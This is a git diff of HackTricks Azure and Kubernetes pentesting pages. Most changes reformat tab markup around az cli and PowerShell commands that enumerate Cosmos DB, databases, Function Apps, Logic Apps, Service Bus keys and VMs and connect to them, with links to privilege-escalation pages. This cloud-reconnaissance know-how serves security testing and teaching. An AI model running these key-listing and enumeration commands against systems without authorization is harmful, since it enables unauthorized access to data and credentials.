# List all user-defined functions (UDFs) in a specific Cosmos DB SQL container.
Get-AzCosmosDBSqlUserDefinedFunction -ResourceGroupName "<ResourceGroupName>" -AccountName "<AccountName>" -DatabaseName "<DatabaseName>" -ContainerName "<ContainerName>"
```
{% endcode %}
{% endtab %}
{% endtabs %}
{{#endtab }}
{{#endtabs }}
#### Connection
To connect the azure-cosmosDB (pip install azure-cosmos) library is needed. Additionally the endpoint and the key are crutial components to make the connection.
{% code overflow="wrap" %}
```python
from azure.cosmos import CosmosClient, PartitionKey
@@ -159,11 +152,9 @@ print("All items in the container:")
for item in all_items:
print(item)
```
{% endcode %}
Another way of stablishing a connection is to use the **DefaultAzureCredential()**. Just need to login (az login) with the account that has the permissions and execute it. For this case a role assigment must be done, giving the necesary permissions (see for mor)
{% code overflow="wrap" %}
```python
from azure.identity import DefaultAzureCredential
from azure.cosmos import CosmosClient
@@ -188,16 +179,13 @@ item = {
container.create_item(item)
print("Document inserted.")
```
{% endcode %}
### MongoDB
The MongoDB NoSQL API is a document-based API that uses JSON-like BSON (Binary JSON) as its data format. It provides a query language with aggregation capabilities, making it suitable for working with structured, semi-structured, and unstructured data. The endpoint of the service typically follows this format:
{% code overflow="wrap" %}
```bash
mongodb://<hostname>:<port>/<database>
```
{% endcode %}
#### Databases
In MongoDB, you can create one or more databases within an instance. Each database serves as a logical grouping of collections and provides a boundary for resource organization and management. Databases help separate and manage data logically, such as for different applications or projects.
@@ -207,9 +195,8 @@ The core unit of data storage in MongoDB is the collection, which holds document
#### Enumeration
{% tabs %}
{% tab title="az cli" %}
{% code overflow="wrap" %}
{{#tabs }}
{{#tab name="az cli" }}
```bash
# CosmoDB Account
## List Azure Cosmos DB database accounts.
@@ -236,11 +223,9 @@ az cosmosdb mongodb role definition list --account-name <AccountName> --resource
# List all user definitions for MongoDB within an Azure Cosmos DB account
az cosmosdb mongodb user definition list --account-name <AccountName> --resource-group <ResourceGroupName>
```
{% endcode %}
{% endtab %}
{{#endtab }}
{% tab title="Az PowerShell" %}
{% code overflow="wrap" %}
{{#tab name="Az Powershell" }}
```bash
Get-Command -Module Az.CosmosDB
@@ -272,14 +257,12 @@ Get-AzCosmosDBMongoDBDatabaseThroughput -AccountName <account-name> -ResourceGro
Get-AzCosmosDBMongoDBRoleDefinition -AccountName <account-name> -ResourceGroupName <resource-group-name>
```
{% endcode %}
{% endtab %}
{% endtabs %}
{{#endtab }}
{{#endtabs }}
#### Connection
Here the password you can find them with the keys or with the method decribed in the privesc section.
{% code overflow="wrap" %}
```python
from pymongo import MongoClient
@@ -312,26 +295,25 @@ document = {
result = collection.insert_one(document)
print(f"Inserted document with ID: {result.inserted_id}")
```
{% endcode %}
## References
* [https://learn.microsoft.com/en-us/azure/cosmos-db/choose-api](https://learn.microsoft.com/en-us/azure/cosmos-db/choose-api)
* [https://learn.microsoft.com/en-us/azure/cosmos-db/](https://learn.microsoft.com/en-us/azure/cosmos-db/)
* [https://learn.microsoft.com/en-us/azure/cosmos-db/introduction](https://learn.microsoft.com/en-us/azure/cosmos-db/introduction)
* [https://learn.microsoft.com/en-us/azure/cosmos-db/nosql/security/how-to-grant-data-plane-role-based-access?tabs=built-in-definition%2Ccsharp&pivots=azure-interface-cli](https://learn.microsoft.com/en-us/azure/cosmos-db/nosql/security/how-to-grant-data-plane-role-based-access?tabs=built-in-definition%2Ccsharp&pivots=azure-interface-cli)
- [https://learn.microsoft.com/en-us/azure/cosmos-db/choose-api](https://learn.microsoft.com/en-us/azure/cosmos-db/choose-api)
- [https://learn.microsoft.com/en-us/azure/cosmos-db/](https://learn.microsoft.com/en-us/azure/cosmos-db/)
- [https://learn.microsoft.com/en-us/azure/cosmos-db/introduction](https://learn.microsoft.com/en-us/azure/cosmos-db/introduction)
- [https://learn.microsoft.com/en-us/azure/cosmos-db/nosql/security/how-to-grant-data-plane-role-based-access?tabs=built-in-definition%2Ccsharp&pivots=azure-interface-cli](https://learn.microsoft.com/en-us/azure/cosmos-db/nosql/security/how-to-grant-data-plane-role-based-access?tabs=built-in-definition%2Ccsharp&pivots=azure-interface-cli)
## Privilege Escalation
{% content-ref url="../az-privilege-escalation/az-cosmosDB-privesc.md" %}
[az-cosmosDB-privesc.md](../az-privilege-escalation/az-cosmosDB-privesc.md)
{% endcontent-ref %}
{{#ref}}
../az-privilege-escalation/az-cosmosDB-privesc.md
{{#endref}}
## Post Exploitation
{% content-ref url="../az-post-exploitation/az-cosmosDB-post-exploitation.md" %}
[az-cosmosDB-post-exploitation.md](../az-post-exploitation/az-sql-post-exploitation.md)
{% endcontent-ref %}
{{#ref}}
../az-post-exploitation/az-sql-post-exploitation.md
{{#endref}}
## ToDo

13
src/pentesting-cloud/azure-security/az-services/az-file-shares.md
View File

@@ -30,9 +30,8 @@
## Enumeration
{{#tabs}}
{{#tab name="az cli"}}
{{#tabs }}
{{#tab name="az" }}
```bash
# Get storage accounts
az storage account list #Get the account name from here
@@ -60,9 +59,9 @@ az storage file list --account-name <name> --share-name <share-name> --snapshot
az storage file download-batch -d . --account-name <name> --source <share-name> --snapshot <snapshot-version>
```
{{#endtab}}
{{#endtab }}
{{#tab name="Az PowerShell"}}
{{#tab name="Az Powershell" }}
```bash
Get-AzStorageAccount
@@ -85,8 +84,8 @@ Get-AzStorageFile -ShareName "<share-name>" -Context (New-AzStorageContext -Stor
```
{{#endtab}}
{{#endtabs}}
{{#endtab }}
{{#endtabs }}
> [!NOTE]
> By default `az` cli will use an account key to sign a key and perform the action. To use the Entra ID principal privileges use the parameters `--auth-mode login --enable-file-backup-request-intent`.

18
src/pentesting-cloud/azure-security/az-services/az-function-apps.md
View File

@@ -207,9 +207,9 @@ Moreover, **no source code will be stored in the storage** account related to th
## Enumeration
{% tabs %}
{% tab title="az cli" %}
{% code overflow="wrap" %}
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List all the functions
az functionapp list
@@ -255,11 +255,9 @@ curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/func
# Get source code
az rest --url "https://management.azure.com/<subscription>/resourceGroups/<res-group>/providers/Microsoft.Web/sites/<app-name>/hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01"
```
{% endcode %}
{% endtab %}
{{#endtab }}
{% tab title="Az PowerShell" %}
{% code overflow="wrap" %}
{{#tab name="Az Powershell" }}
```powershell
Get-Command -Module Az.Functions
@@ -275,9 +273,9 @@ Get-AzFunctionAppPlan -ResourceGroupName <String> -Name <String>
# Retrieves the app settings for a specific Azure Function App.
Get-AzFunctionAppSetting -Name <FunctionAppName> -ResourceGroupName <ResourceGroupName>
```
{% endcode %}
{% endtab %}
{% endtabs %}
{{#endtab }}
{{#endtabs }}
## Privilege Escalation

44
src/pentesting-cloud/azure-security/az-services/az-logic-apps.md
View File

@@ -45,9 +45,8 @@ There are several hosting options:
### Enumeration
{% tabs %}
{% tab title="az cli" %}
{% code overflow="wrap" %}
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List
az logic workflow list --resource-group <ResourceGroupName>
@@ -110,11 +109,9 @@ az logicapp show --name <LogicAppName> --resource-group <ResourceGroupName>
# List all application settings for a specific Logic App
az logicapp config appsettings list --name <LogicAppName> --resource-group <ResourceGroupName>
```
{% endcode %}
{% endtab %}
{{#endtab }}
{% tab title="Az PowerShell" %}
{% code overflow="wrap" %}
{{#tab name="Az Powershell" }}
```bash
Get-Command -Module Az.LogicApp
@@ -140,9 +137,8 @@ Get-AzLogicAppTriggerCallbackUrl -ResourceGroupName "<ResourceGroupName>" -LName
Get-AzLogicAppTriggerHistory -ResourceGroupName "<ResourceGroupName>" -Name "<LogicAppName>" -TriggerName "<TriggerName>"
```
{% endcode %}
{% endtab %}
{% endtabs %}
{{#endtab }}
{{#endtabs }}
@@ -160,9 +156,8 @@ Get-AzLogicAppTriggerHistory -ResourceGroupName "<ResourceGroupName>" -Name "<Lo
#### Enumeration
{% tabs %}
{% tab title="az cli" %}
{% code overflow="wrap" %}
{{#tabs }}
{{#tab name="az cli" }}
```bash
# Integration account
az logic integration-account list --resource-group <resource-group-name>
@@ -222,11 +217,9 @@ az logic integration-account assembly show \
```
{% endcode %}
{% endtab %}
{{#endtab }}
{% tab title="Az PowerShell" %}
{% code overflow="wrap" %}
{{#tab name="Az Powershell" }}
```powershell
Get-Command -Module Az.LogicApp
@@ -257,24 +250,23 @@ Get-AzIntegrationAccountPartner -ResourceGroupName <resource-group-name> -Integr
# Retrieve details of a specific schema in an integration account
Get-AzIntegrationAccountSchema -ResourceGroupName <resource-group-name> -IntegrationAccountName <integration-account-name> -Name <schema-name>
```
{% endcode %}
{% endtab %}
{% endtabs %}
{{#endtab }}
{{#endtabs }}
## Privilege Escalation
Same as logic apps privesc:
{% content-ref url="../az-privilege-escalation/az-logic-apps-privesc.md" %}
[az-logic-apps-privesc.md](../az-privilege-escalation/az-logic-apps-privesc.md)
{% endcontent-ref %}
{{#ref}}
../az-privilege-escalation/az-logic-apps-privesc.md
{{#endref}}
## Post Exploitation
{% content-ref url="../az-post-exploitation/az-logic-apps-post-exploitation.md" %}
[az-logic-apps-post-exploitation.md](../az-post-exploitation/az-logic-apps-post-exploitation.md)
{% endcontent-ref %}
{{#ref}}
../az-post-exploitation/az-logic-apps-post-exploitation.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

34
src/pentesting-cloud/azure-security/az-services/az-mysql.md
View File

@@ -23,9 +23,8 @@ Azure Database for MySQL is a fully managed relational database service based on
### Enumeration
{% tabs %}
{% tab title="az cli" %}
{% code overflow="wrap" %}
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List all flexible-servers
az mysql flexible-server db list --resource-group <resource-group-name>
@@ -55,11 +54,9 @@ az mysql flexible-server maintenance list --resource-group <resource-group-name>
az mysql flexible-server server-logs list --resource-group <resource-group-name> --server-name <server_name>
```
{% endcode %}
{% endtab %}
{{#endtab }}
{% tab title="Az PowerShell" %}
{% code overflow="wrap" %}
{{#tab name="Az Powershell" }}
```bash
Get-Command -Module Az.MySql
@@ -95,15 +92,13 @@ Get-AzMySqlFlexibleServerMaintenanceWindow -ResourceGroupName <resource-group-na
# List log files for a server
Get-AzMySqlFlexibleServerLog -ResourceGroupName <resource-group-name> -ServerName <server_name>
```
{% endcode %}
{% endtab %}
{% endtabs %}
{{#endtab }}
{{#endtabs }}
### Connection
With the extension rdbms-connect you can access the database with:
{% code overflow="wrap" %}
```bash
az mysql flexible-server connect -n <server-name> -u <username> -p <password> --interactive
@@ -116,17 +111,13 @@ az mysql flexible-server execute \
--querytext "SELECT * FROM <table-name>;"
```
{% endcode %}
Or with the MySQL native extension plugin
{% code overflow="wrap" %}
```bash
mysql -h <server-name>.mysql.database.azure.com -P 3306 -u <username> -p
```
{% endcode %}
Also you can execute queries with github but the password and user are also needed. You need to set up a sql file with the query to run and then:
{% code overflow="wrap" %}
```bash
# Setup
az mysql flexible-server deploy setup \
@@ -145,19 +136,18 @@ az mysql flexible-server deploy run \
--action-name <action-name> \
--branch <branch-name>
```
{% endcode %}
## Privilege Escalation
{% content-ref url="../az-privilege-escalation/az-mysql-privesc.md" %}
[az-mysql-privesc.md](../az-privilege-escalation/az-mysql-privesc.md)
{% endcontent-ref %}
{{#ref}}
../az-privilege-escalation/az-mysql-privesc.md
{{#endref}}
## Post Exploitation
{% content-ref url="../az-post-exploitation/az-mysql-post-exploitation.md" %}
[az-sql-mysql-exploitation.md](../az-post-exploitation/az-mysql-post-exploitation.md)
{% endcontent-ref %}
{{#ref}}
../az-post-exploitation/az-mysql-post-exploitation.md
{{#endref}}
## ToDo

38
src/pentesting-cloud/azure-security/az-services/az-postgresql.md
View File

@@ -26,9 +26,8 @@
### Enumeration
{% tabs %}
{% tab title="az cli" %}
{% code overflow="wrap" %}
{{#tabs }}
{{#tab name="az cli" }}
```bash
# List servers in a resource group
az postgres flexible-server list --resource-group <resource-group-name>
@@ -64,11 +63,9 @@ az postgres flexible-server maintenance list --resource-group <resource-group-na
az postgres flexible-server server-logs list --resource-group <resource-group-name> --server-name <server_name>
```
{% endcode %}
{% endtab %}
{{#endtab }}
{% tab title="Az PowerShell" %}
{% code overflow="wrap" %}
{{#tab name="Az Powershell" }}
```bash
Get-Command -Module Az.PostgreSql
@@ -91,15 +88,13 @@ Get-AzPostgreSqlFlexibleServerLocationBasedCapability -Location <location>
Get-AzPostgreSqlServer -ResourceGroupName <resource-group-name>
```
{% endcode %}
{% endtab %}
{% endtabs %}
{{#endtab }}
{{#endtabs }}
### Connection
With the extension rdbms-connect you can access the database with:
{% code overflow="wrap" %}
```bash
az postgres flexible-server connect -n <server-name> -u <username> -p <password> --interactive
@@ -112,32 +107,29 @@ az postgres flexible-server execute \
--querytext "SELECT * FROM <table-name>;"
```
{% endcode %}
Or
{% code overflow="wrap" %}
```bash
psql -h testpostgresserver1994.postgres.database.azure.com -p 5432 -U adminuser <database-name>
```
{% endcode %}
## References
* [https://learn.microsoft.com/en-us/azure/postgresql/](https://learn.microsoft.com/en-us/azure/postgresql/)
* [https://learn.microsoft.com/en-us/azure/postgresql/flexible-server/service-overview](https://learn.microsoft.com/en-us/azure/postgresql/flexible-server/service-overview)
* [https://learn.microsoft.com/en-us/azure/postgresql/flexible-server/overview](https://learn.microsoft.com/en-us/azure/postgresql/flexible-server/overview)
- [https://learn.microsoft.com/en-us/azure/postgresql/](https://learn.microsoft.com/en-us/azure/postgresql/)
- [https://learn.microsoft.com/en-us/azure/postgresql/flexible-server/service-overview](https://learn.microsoft.com/en-us/azure/postgresql/flexible-server/service-overview)
- [https://learn.microsoft.com/en-us/azure/postgresql/flexible-server/overview](https://learn.microsoft.com/en-us/azure/postgresql/flexible-server/overview)
## Privilege Escalation
{% content-ref url="../az-privilege-escalation/az-postgresql-privesc.md" %}
[az-postgresql-privesc.md](../az-privilege-escalation/az-postgresql-privesc.md)
{% endcontent-ref %}
{{#ref}}
../az-privilege-escalation/az-postgresql-privesc.md
{{#endref}}
## Post Exploitation
{% content-ref url="../az-post-exploitation/az-postgresql-post-exploitation.md" %}
[az-postgresql-post-exploitation.md](../az-post-exploitation/az-postgresql-post-exploitation.md)
{% endcontent-ref %}
{{#ref}}
../az-post-exploitation/az-postgresql-post-exploitation.md
{{#endref}}
## ToDo

10
src/pentesting-cloud/azure-security/az-services/az-queue-enum.md
View File

@@ -13,19 +13,19 @@ Azure Queue Storage is a service in Microsoft's Azure cloud platform designed fo
```bash
# You need to know the --account-name of the storage (az storage account list)
az storage queue list --account-name <storage_account>
az storage queue list --account-name <storage_account> # --auth-mode login
# Queue Metadata
az storage queue metadata show --name <queue_name> --account-name <storage_account>
az storage queue metadata show --name <queue_name> --account-name <storage_account> # --auth-mode login
#Get ACL
az storage queue policy list --queue-name <queue_name> --account-name <storage_account>
az storage queue policy list --queue-name <queue_name> --account-name <storage_account> # --auth-mode login
# Get Messages (getting a message deletes it)
az storage message get --queue-name <queue_name> --account-name <storage_account>
az storage message get --queue-name <queue_name> --account-name <storage_account> # --auth-mode login
# Peek Messages
az storage message peek --queue-name <queue_name> --account-name <storage_account>
az storage message peek --queue-name <queue_name> --account-name <storage_account> # --auth-mode login
```
{{#endtab }}

22
src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md
View File

@@ -51,9 +51,8 @@ sku, authrorization rule,
### Enumeration
{% tabs %}
{% tab title="az cli" %}
{% code overflow="wrap" %}
{{#tabs }}
{{#tab name="az cli" }}
```bash
# Queue Enumeration
az servicebus queue list --resource-group <MyResourceGroup> --namespace-name <MyNamespace>
@@ -81,11 +80,9 @@ az servicebus queue authorization-rule list --resource-group <MyResourceGroup> -
az servicebus topic authorization-rule list --resource-group <MyResourceGroup> --namespace-name <MyNamespace> --topic-name <MyTopic>
az servicebus namespace authorization-rule keys list --resource-group <MyResourceGroup> --namespace-name <MyNamespace> --name <MyAuthRule>
```
{% endcode %}
{% endtab %}
{{#endtab }}
{% tab title="Az PowerShell" %}
{% code overflow="wrap" %}
{{#tab name="Az Powershell" }}
```powershell
Get-Command -Module Az.ServiceBus
@@ -128,9 +125,8 @@ Get-AzServiceBusSubscription -ResourceGroupName <ResourceGroupName> -NamespaceNa
# Retrieves details of a specified topic in a Service Bus namespace.
Get-AzServiceBusTopic -ResourceGroupName <ResourceGroupName> -NamespaceName <NamespaceName>
```
{% endcode %}
{% endtab %}
{% endtabs %}
{{#endtab }}
{{#endtabs }}
### Privilege Escalation
@@ -147,9 +143,9 @@ Get-AzServiceBusTopic -ResourceGroupName <ResourceGroupName> -NamespaceName <Nam
## References
- https://learn.microsoft.com/en-us/powershell/module/az.servicebus/?view=azps-13.0.0
- https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-messaging-overview
- https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-quickstart-cli
- [https://learn.microsoft.com/en-us/powershell/module/az.servicebus/?view=azps-13.0.0](https://learn.microsoft.com/en-us/powershell/module/az.servicebus/?view=azps-13.0.0)
- [https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-messaging-overview](https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-messaging-overview)
- [https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-quickstart-cli](https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-quickstart-cli)
{{#include ../../../banners/hacktricks-training.md}}

7
src/pentesting-cloud/azure-security/az-services/vms/README.md
View File

@@ -213,6 +213,8 @@ https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/
## VM Enumeration
{{#tabs}}
{{#tab name="az cli"}}
```bash
# VMs
## List all VMs and get info about one
@@ -348,7 +350,9 @@ az resource list --resource-type "Microsoft.Compute/virtualMachines" --query "[]
# List all available run commands for virtual machines
az vm run-command list --output table
```
{{#endtab }}
{{#tab name="Az Powershell" }}
```bash
# Get readable VMs
Get-AzVM | fl
@@ -441,6 +445,9 @@ Get-AzVMExtension -VMName <VmName> -ResourceGroupName <ResourceGroupName>
```
{{#endtab }}
{{#endtabs }}
## Code Execution in VMs
### VM Extensions

3
src/pentesting-cloud/azure-security/az-services/vms/az-azure-network.md
View File

@@ -103,8 +103,9 @@ Azure Firewall is a **managed network security service** in Azure that protects
It is available in three SKUs—**Basic**, **Standard**, and **Premium**, each tailored for specific customer needs:
| **Recommended Use Case** | Small/Medium Businesses (SMBs) with limited needs | General enterprise use, Layer 37 filtering | Highly sensitive environments (e.g., payment processing) |
| Criteria/Feature | Option 1 | Option 2 | Option 3 |
| ------------------------------ | ------------------------------------------------- | ------------------------------------------- | --------------------------------------------------------- |
| **Recommended Use Case** | Small/Medium Businesses (SMBs) with limited needs | General enterprise use, Layer 37 filtering | Highly sensitive environments (e.g., payment processing) |
| **Performance** | Up to 250 Mbps throughput | Up to 30 Gbps throughput | Up to 100 Gbps throughput |
| **Threat Intelligence** | Alerts only | Alerts and blocking (malicious IPs/domains) | Alerts and blocking (advanced threat intelligence) |
| **L3L7 Filtering** | Basic filtering | Stateful filtering across protocols | Stateful filtering with advanced inspection |

3
src/pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md
View File

@@ -13,8 +13,9 @@ When specifying the security context of a Pod you can use several attributes. Fr
- If possible, consider **limiting** **permissions** indicating **seLinuxOptions** and **seccompProfile**
- Do **NOT** give **privilege** **group** access via **runAsGroup** and **supplementaryGroups**
| Parameter | Description |
| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core"><strong>fsGroup</strong></a><br><em>integer</em></p> | <p>A special supplemental group that applies to <strong>all containers in a pod</strong>. Some volume types allow the Kubelet to <strong>change the ownership of that volume</strong> to be owned by the pod:<br>1. The owning GID will be the FSGroup<br>2. The setgid bit is set (new files created in the volume will be owned by FSGroup)<br>3. The permission bits are OR'd with rw-rw---- If unset, the Kubelet will not modify the ownership and permissions of any volume</p> |
| ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core"><strong>fsGroupChangePolicy</strong></a><br><em>string</em></p> | This defines behavior of **changing ownership and permission of the volume** before being exposed inside Pod. |
| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core"><strong>runAsGroup</strong></a><br><em>integer</em></p> | The **GID to run the entrypoint of the container process**. Uses runtime default if unset. May also be set in SecurityContext. |
| <p><a href="https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core"><strong>runAsNonRoot</strong></a><br><em>boolean</em></p> | Indicates that the container must run as a non-root user. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. |